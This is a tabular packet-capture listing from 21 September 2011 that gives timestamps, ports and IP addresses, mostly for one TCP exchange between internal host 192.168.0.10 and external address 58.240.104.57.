Sep 21, 2011 16:51:51.061478000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.063395000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:51.063410000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.064178000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:51.095468000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.204405000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.206406000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:51.206420000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.241673000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.243371000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:51.243385000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.365138000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:51.571524000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.624568000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.626443000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:51.626459000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.630203000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:51.889574000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.945216000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.949089000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:51.949104000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:51.953026000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.015119000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.068941000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.073369000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.073385000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.075458000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.222184000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.276822000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.277478000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.277495000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.278181000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.297637000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.348630000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.349470000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.349486000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.350239000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.369444000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.423335000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.424548000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.424567000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.425753000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.444584000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.495913000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.496905000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.496920000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.503296000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.516507000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.598316000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.603537000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.603552000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.608018000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.619376000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.650471000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.653296000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.653311000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.793215000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.808019000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.843462000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:52.846408000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:52.846423000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.012434000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:53.012452000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.154432000 CEST	9040	1289	192.168.0.2	192.168.0.10
Sep 21, 2011 16:51:53.225446000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:53.253971000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.277224000 CEST	9040	1305	192.168.0.2	192.168.0.10
Sep 21, 2011 16:51:53.316233000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.316681000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:53.316693000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.337332000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.338240000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:53.338253000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.553402000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:53.553416000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.596520000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.596968000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:53.596984000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.704574000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.705033000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:53.705049000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.707720000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:53.766074000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.787196000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.787780000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:53.787796000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.916487000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.917249000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:53.917263000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:53.917574000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:54.402810000 CEST	1120	8685	192.168.0.10	60.165.98.198
Sep 21, 2011 16:51:54.402824000 CEST	8685	1120	60.165.98.198	192.168.0.10
Sep 21, 2011 16:51:54.719712000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:54.756485000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:54.762555000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:54.843016000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:54.845404000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:54.880063000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:54.880069000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:54.883198000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:55.425910000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:55.472753000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:55.473540000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:55.473560000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:55.630779000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:55.630792000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:55.634434000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:55.635033000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:55.679369000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:55.681533000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:55.736451000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:55.736459000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:55.739304000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:55.893878000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:55.937128000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:55.937915000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:55.937928000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.036740000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.042403000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:56.177711000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:56.184323000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.292475000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.293429000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:56.341302000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.342520000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:56.384663000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.384670000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.386681000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:56.685907000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.739639000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.742347000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:56.742363000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.812833000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.817088000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:56.833633000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.834946000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:56.886649000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.890573000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:56.907467000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.948079000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:56.948793000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:56.948807000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.074979000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.080900000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:57.111536000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.113050000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:57.144426000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.144433000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.148367000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:57.303385000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.396241000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.397035000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:57.397052000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.474410000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.475279000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:57.475295000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.549246000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.551227000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:57.571371000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.572811000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:57.626442000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.626449000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:57.629588000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.127425000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.166585000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.167341000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.167383000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.239542000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.242710000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.242726000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.243423000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.421607000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.470416000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.471224000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.471239000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.472824000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.510032000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.566379000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.573376000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.573390000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.575096000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.590621000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.700013000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.701780000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.701798000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.702650000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.721016000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.759149000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.760071000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.760086000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.762630000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.864888000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.906748000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.908205000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.908220000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.910262000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.947408000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.985677000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.989044000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:58.989059000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:58.993326000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.095798000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.122623000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.149873000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.149879000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.152141000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.176577000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.260099000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.331636000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.332593000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.332608000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.333291000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.378876000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.436342000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.437174000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.437194000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.440106000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.467835000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.516219000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.516909000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.516923000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.519568000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.570454000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.666206000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.666896000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.666910000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.670192000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.740910000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.788459000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.788886000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.788899000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.791652000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.843896000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.892073000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.892646000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.892660000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.893285000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.937048000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.983755000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.984180000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:51:59.984194000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:51:59.987413000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.026351000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.086349000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.086869000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.086891000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.088939000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.176004000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.212979000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.213745000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.213758000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.220879000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.246867000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.304638000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.305378000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.305393000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.311155000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.349874000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.391539000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.393208000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.393220000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.394744000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.470838000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.556195000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.557043000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.557057000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.558057000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.577194000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.631077000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.631894000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.631909000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.632578000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.676918000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.733742000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.738862000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.738876000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.742450000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.754500000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.799694000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.800977000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.800990000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.803149000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.820434000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.916558000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.919509000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.919525000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.926294000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:00.931866000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:00.931881000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.102448000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:01.102462000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.216390000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.217083000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:01.217107000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.222497000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:01.249566000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.249573000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.252811000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:01.319542000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.536739000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:01.536764000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.686190000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.686945000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:01.686964000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.691440000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:01.710410000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.766373000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.767105000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:01.767119000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:01.769630000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:01.887525000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:02.007226000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:02.011189000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:02.011203000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:02.192921000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:02.192933000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:02.326346000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:02.332245000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:02.332259000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:02.520811000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:02.520824000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:02.693029000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:02.695535000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:02.695550000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:02.746600000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:02.749763000 CEST	1122	16778	192.168.0.10	58.240.104.57
